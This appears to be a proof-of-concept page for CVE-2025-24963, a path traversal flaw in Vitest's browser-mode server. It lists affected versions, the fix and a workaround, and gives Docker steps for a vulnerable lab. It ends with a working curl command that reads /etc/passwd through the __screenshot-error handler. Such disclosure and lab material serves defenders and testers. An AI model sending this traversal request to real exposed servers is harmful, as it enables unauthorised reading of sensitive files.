POC details: 8c6cd60bff91beb9c70cd8bb2dbe75587d6daaaa

Source
Related vulnerability
Title: Vitest path traversal vulnerability (CVE-2025-24963)
Description: Vitest is an open-source, Vite-powered next-generation testing framework. Vitest contains a path traversal vulnerability: the `__screenshot-error` handler of the browser mode HTTP server can respond with any file on the file system.
Introduction
# CVE-2025-24963 - Vitest Browser Mode - Local File Read

CVE-2025-24963 is a medium-severity vulnerability (CVSS 3.1 score: 5.9) affecting the `@vitest/browser` package, a component of the Vitest testing framework powered by Vite. The vulnerability arises from improper input validation in the `__screenshot-error` handler of the browser mode HTTP server. When the server is exposed to the network using the configuration option `browser.api.host: true`, an attacker can send specially crafted requests to read arbitrary files on the server's file system, potentially leading to unauthorized disclosure of sensitive information.

## Affected Versions
The vulnerability affects the following versions of `@vitest/browser`:

- 2.0.4 to 2.1.8
- 3.0.0 to 3.0.3

## Mitigation
This issue has been addressed in versions 2.1.9 and 3.0.4. Users are strongly advised to upgrade to these or later versions to mitigate the vulnerability.

## Workaround
If immediate upgrading is not feasible, a temporary workaround is to avoid exposing the browser mode server to the network by not setting `browser.api.host: true` in your configuration. This will prevent external access to the vulnerable handler.

## Prepare Environment

```bash
git clone https://github.com/0xdeviner/CVE-2025-24963.git
cd CVE-2025-24963/vitest-vuln-demo
docker build -t vitest-cve-2025-24963 .
docker run -itd --name vitest-cve -p 63315:63315 vitest-cve-2025-24963
```

> Note: The port Vitest uses is dynamic (e.g., 63315). You may want to monitor the logs and adjust your `-p` flag accordingly.

## Exploit

```bash
curl "http://<IP>:63315/__screenshot-error?file=../../../../../../etc/passwd"
```
File snapshot

```
[4.0K] /data/pocs/8c6cd60bff91beb9c70cd8bb2dbe75587d6daaaa
├── [1.6K] README.md
└── [4.0K] vitest-vuln-demo
    ├── [ 384] Dockerfile
    ├── [ 208] package.json
    ├── [4.0K] src
    │   └── [  93] example.test.js
    └── [ 350] vitest.config.ts

2 directories, 5 files
```